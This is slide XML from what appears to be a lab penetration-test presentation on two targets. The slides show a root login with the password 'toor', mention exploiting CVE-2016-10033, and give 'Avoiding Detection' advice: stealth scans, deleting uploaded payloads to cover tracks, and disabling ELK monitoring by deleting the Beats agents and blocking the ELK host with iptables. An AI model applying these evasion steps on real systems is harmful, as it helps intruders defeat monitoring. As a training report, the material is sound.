            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>BadPass.md</a:t>
            </a:r>
            <a:endParaRPr>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25" name="Google Shape;22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latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>www/data@target$2 su - root</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Password: toor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>root@target2$</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="Google Shape;226;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032913" y="1704963"/>
            <a:ext cx="3171825" cy="866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0" name="Shape 230"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="24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D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>README.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="937575"/>
            <a:ext cx="8520600" cy="36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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Enumeration </a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Multiple enumeration tools, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>nmap, wpscan and many others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> have stealth scan feature that can be used to generate less noise on the target system. </a:t>
            </a:r>
            <a:endParaRPr sz="850">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>In a stealth scan: SYN packet is sent, looking for a SYN/ACK packet, but instead of sending an ACK packet back, it kills the connection early by sending a RST packet as soon as an SYN/ACK packet is found, and if no SYN/ACK packet gets sent pack, (or if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>certain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> ICMP errors are returned), then the port is filtered. If a RST packet is sent then the port is closed.</a:t>
            </a:r>
            <a:endParaRPr sz="850">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Cleaning up payloads</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>For Target 2, we uploaded a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> using a script associated with CVE-2016-10033, after gaining root access, deleting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> would be important for cleaning up our tracks, including the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> done to MySQL to gain root access.</a:t>
            </a:r>
            <a:endParaRPr sz="850">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Disable Kibana</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Beats are stored in /etc/, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="850">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>you can delete packetbeat, metricbeat, and filebeat to end system, also with root access, you can disable connection to the IP associated with the ELK stack using iptables, which you would find with a network wide nmap scan.</a:t>
            </a:r>
            <a:endParaRPr sz="850">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7342200" y="4872800"/>
            <a:ext cx="412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6FA8DC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://nmap.org/book/synscan.html</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="6FA8D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15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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>conclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>README.md</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42495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lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Vulnerability in Target 1 and 2: Poor  password management, stored credentials, sudo python access</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Vulnerability in Target 2: CVE-2016-10033, privilege escalation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Detection of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> in Target 1 and 2:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Gobuster, WPScan, John/Hashcat </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>sudo python access</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>http:/192.168.1.115/vendor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Fira Code"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>s aux | grep -i “root”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Cod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37450" y="20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AA84F"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>ls -la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>table_of_contents/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>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3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>rwxr-xr-x 1 kali 0001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>Network_Topology.png</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>drwxr-xr-x 1 kali 0002 Recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Fira Code"/>
                <a:ea typeface="Fira Code"/>
                <a:cs typeface="Fira Code"/>
                <a:sym typeface="Fira Code"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="3D85C6"/>
              </a:solidFill>
              <a:latin typeface="Fira Code"/>
              <a:ea typeface="Fira Code"/>
              <a:cs typeface="Fira Code"/>
              <a:sym typeface="Fira Code"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
